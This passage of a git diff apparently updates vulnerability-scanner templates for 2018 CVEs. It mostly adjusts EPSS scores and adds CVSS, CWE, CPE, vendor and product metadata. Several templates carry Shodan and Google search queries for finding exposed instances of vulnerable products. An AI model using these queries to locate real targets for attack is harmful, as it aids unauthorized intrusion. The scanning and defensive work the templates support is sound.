0.42502 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 37d75235b8..81a0dc8fe8 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 - epss-score: 0.97406 + epss-score: 0.97405 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* + epss-percentile: 0.99881 metadata: max-request: 2 shodan-query: product:"Kubernetes" diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index f50f23dafc..2ae82495e1 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.97376 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* + epss-percentile: 0.99858 metadata: max-request: 1 vendor: control-webpanel diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index e062649078..ce5e52cc12 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00098 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* + epss-percentile: 0.40032 metadata: max-request: 1 vendor: planonsoftware diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 63da2f3809..2ab7dc5aca 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00177 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* + epss-percentile: 0.54186 metadata: max-request: 1 shodan-query: http.html:"DedeCms" diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 705ad23980..5092f3c21c 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00235 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* + epss-percentile: 0.60867 metadata: max-request: 1 vendor: microstrategy diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index ff0ed1585f..7c8b046296 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00238 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* + epss-percentile: 0.61201 metadata: max-request: 1 vendor: microstrategy diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 4ef63598c2..1faa2acf10 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-200 epss-score: 0.95125 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* + epss-percentile: 0.99024 metadata: max-request: 1 vendor: acme diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index a9e4221336..e28b1ed11d 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -3,20 +3,30 @@ id: CVE-2018-18809 info: name: TIBCO JasperReports Library - Directory Traversal author: DhiyaneshDK - severity: critical + severity: medium description: | The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. reference: - https://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html - https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18809 + - http://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html + - http://seclists.org/fulldisclosure/2019/Sep/17 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 cve-id: CVE-2018-18809 + cwe-id: CWE-22 + epss-score: 0.46465 + cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* + epss-percentile: 0.96953 metadata: max-request: 1 verified: true shodan-query: html:"jasperserver-pro" - tags: cve,cve2018,lfi,kev,jasperserver,jasperreport + vendor: tibco + product: jasperreports_library + tags: packetstorm,cve,cve2018,lfi,kev,jasperserver,jasperreport http: - method: GET diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 3e96ad2338..3abc796b1f 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 - epss-score: 0.12213 + epss-score: 0.13227 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* + epss-percentile: 0.94833 metadata: max-request: 2 vendor: gogs diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index c6d9204ebd..481d106409 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19136 cwe-id: CWE-79 - epss-score: 0.00351 + epss-score: 0.00247 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.61938 metadata: max-request: 2 verified: true diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 956c1f0a92..16b75b6070 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0008 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.33312 metadata: max-request: 2 verified: true diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 1c96a75b15..b037766cbc 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.82305 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.97953 metadata: max-request: 2 verified: true diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index 38f253b45d..a691be7d32 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19326 cwe-id: CWE-22 - epss-score: 0.01113 + epss-score: 0.01394 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.84719 metadata: max-request: 1 verified: true diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 5ed7e0217b..77029f05d6 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.1 cve-id: CVE-2018-19365 cwe-id: CWE-22 - epss-score: 0.01748 + epss-score: 0.01616 cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* + epss-percentile: 0.85867 metadata: max-request: 1 vendor: wowza diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 697d602e71..a4ed2c013c 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00205 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* + epss-percentile: 0.57738 metadata: max-request: 1 vendor: solarwinds diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 64637561b8..47dad8fe4e 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.01135 cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* + epss-percentile: 0.82901 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 07f16bcd75..96de053589 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 - epss-score: 0.15682 + epss-score: 0.10992 cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* + epss-percentile: 0.9438 metadata: max-request: 1 vendor: php-proxy diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 001344cb51..46f662e2b5 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00156 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.51378 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index fa8a01f6a5..003fc667d2 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00156 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.51378 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index c2eb77a8f1..3602e63bc4 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00156 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.51378 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index c4f35d57be..2c7dd006e7 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19753 cwe-id: CWE-22 - epss-score: 0.01119 + epss-score: 0.01061 cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* + epss-percentile: 0.82317 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 057ae46c8e..343dac18b6 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00268 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* + epss-percentile: 0.63562 metadata: max-request: 1 verified: true diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 828157ddb1..700f972790 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00101 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.40768 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 4dbd333951..7141536c04 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0025 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.6216 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 69b11737a1..224db35096 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00185 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.55039 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 890eaae0a1..1b08bab775 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0025 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.6216 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index e3bae06be9..955687a22e 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0025 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.6216 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index cb88c0dba7..b33446edf1 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0025 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.6216 metadata: max-request: 3 verified: true diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index e261b9cbe9..b891e9d4f5 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00245 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* + epss-percentile: 0.61735 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index 1a713dec10..e9f990df95 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-20463 cwe-id: CWE-22 - epss-score: 0.02031 + epss-score: 0.02026 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* + epss-percentile: 0.87475 metadata: max-request: 1 verified: true diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 59b267251f..53e4fdff97 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.61765 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* + epss-percentile: 0.97374 metadata: max-request: 1 vendor: sahipro diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 35d4669f3a..c13f35b53d 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-434 epss-score: 0.00794 cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* + epss-percentile: 0.7941 metadata: max-request: 2 google-query: intitle:"Roxy file manager" diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index 288c605c16..e03c8b0dd5 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -8,9 +8,17 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-20608 classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2018-20608 + cwe-id: CWE-200 + epss-score: 0.03654 + cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:* + epss-percentile: 0.90503 metadata: max-request: 1 + vendor: txjia + product: imcat tags: cve,cve2018,imcat,phpinfo,config http: diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 1fb0fcc451..2f4bc40f9f 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00211 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + epss-percentile: 0.58311 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 7107e78bd8..257d98c2c6 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-20 epss-score: 0.01113 cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.82735 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index d4b1ff1f5b..9be966ac35 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-611 epss-score: 0.0032 cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:* + epss-percentile: 0.66795 metadata: max-request: 1 vendor: sap diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index def6129dbb..4be9569149 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2018-2791 epss-score: 0.03569 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* + epss-percentile: 0.90407 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index 2ed4634a2d..a511b9af15 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -18,6 +18,7 @@ info: cve-id: CVE-2018-2894 epss-score: 0.9734 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99824 metadata: max-request: 3 vendor: oracle diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index a15f878805..9259eeaac9 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-3167 - epss-score: 0.01545 + epss-score: 0.01454 cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* + epss-percentile: 0.85018 metadata: max-request: 1 framework: e-business_suite diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index d289951dcd..fd2f039960 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -14,8 +14,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N cvss-score: 6.9 cve-id: CVE-2018-3238 - epss-score: 0.00344 + epss-score: 0.00332 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* + epss-percentile: 0.67419 metadata: max-request: 3 vendor: oracle diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index 5e550c8cb6..292f62f1a6 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.00364 cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:* + epss-percentile: 0.68884 metadata: max-request: 1 framework: node.js diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index cca07b23e0..909f4e89e0 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-200,CWE-22 epss-score: 0.05013 cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:* + epss-percentile: 0.91853 metadata: max-request: 2 vendor: redhat diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index e90dc9a360..02428449e6 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-3810 cwe-id: CWE-287 - epss-score: 0.90148 + epss-score: 0.8409 cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9803 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 24e9e0a20b..508be2f986 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00211 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + epss-percentile: 0.58311 metadata: max-request: 1 shodan-query: http.component:"Atlassian Confluence" diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 31184ff754..880d80e11d 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00295 cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.65386 metadata: max-request: 1 shodan-query: html:"Grav CMS" @@ -51,4 +52,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index aa211cb3a3..7287513a41 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00175 cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.53966 metadata: max-request: 1 verified: true @@ -46,4 +47,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index a924a642bf..cf425d264f 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00129 cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:* + epss-percentile: 0.46905 metadata: max-request: 1 google-query: intext:"SugarCRM Inc. All Rights Reserved" diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index 8442ac5615..469f68fb44 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-200 epss-score: 0.41482 cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* + epss-percentile: 0.96813 metadata: max-request: 1 framework: joomla\! diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 5aaad04dab..4a005c7c1b 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00396 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* + epss-percentile: 0.70146 metadata: max-request: 1 shodan-query: html:"/_next/static" diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 106c56ecaa..a319400f37 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00118 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* + epss-percentile: 0.45103 metadata: max-request: 2 verified: true diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index c1df546c47..c03239d6c2 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-78 epss-score: 0.94099 cpe: cpe:2.3:o:d-link:dir-860l_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.98828 metadata: max-request: 1 vendor: d-link diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 515a5e0fda..2aa22de0f2 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-668 epss-score: 0.03367 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* + epss-percentile: 0.90157 metadata: max-request: 1 vendor: dedecms diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index e6fd1443cb..bbc1fac9f7 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-200 epss-score: 0.06473 cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* + epss-percentile: 0.92792 metadata: max-request: 1 vendor: anchorcms diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index 93c2c34af7..1fa86fc2fa 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-7422 cwe-id: CWE-22 - epss-score: 0.95458 + epss-score: 0.95295 cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99068 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index b6d64bfb40..cfd937634e 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00396 cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* + epss-percentile: 0.70146 metadata: max-request: 1 vendor: axxonsoft diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml index 4074e8d6fb..61dc578f76 100644 --- a/http/cves/2018/CVE-2018-7490.yaml +++ b/http/cves/2018/CVE-2018-7490.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-7490 cwe-id: CWE-22 - epss-score: 0.97067 + epss-score: 0.9656 cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:* + epss-percentile: 0.99436 metadata: max-request: 1 vendor: unbit diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 1800ad4526..c9a9f3184e 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -16,8 +16,9 @@ info: 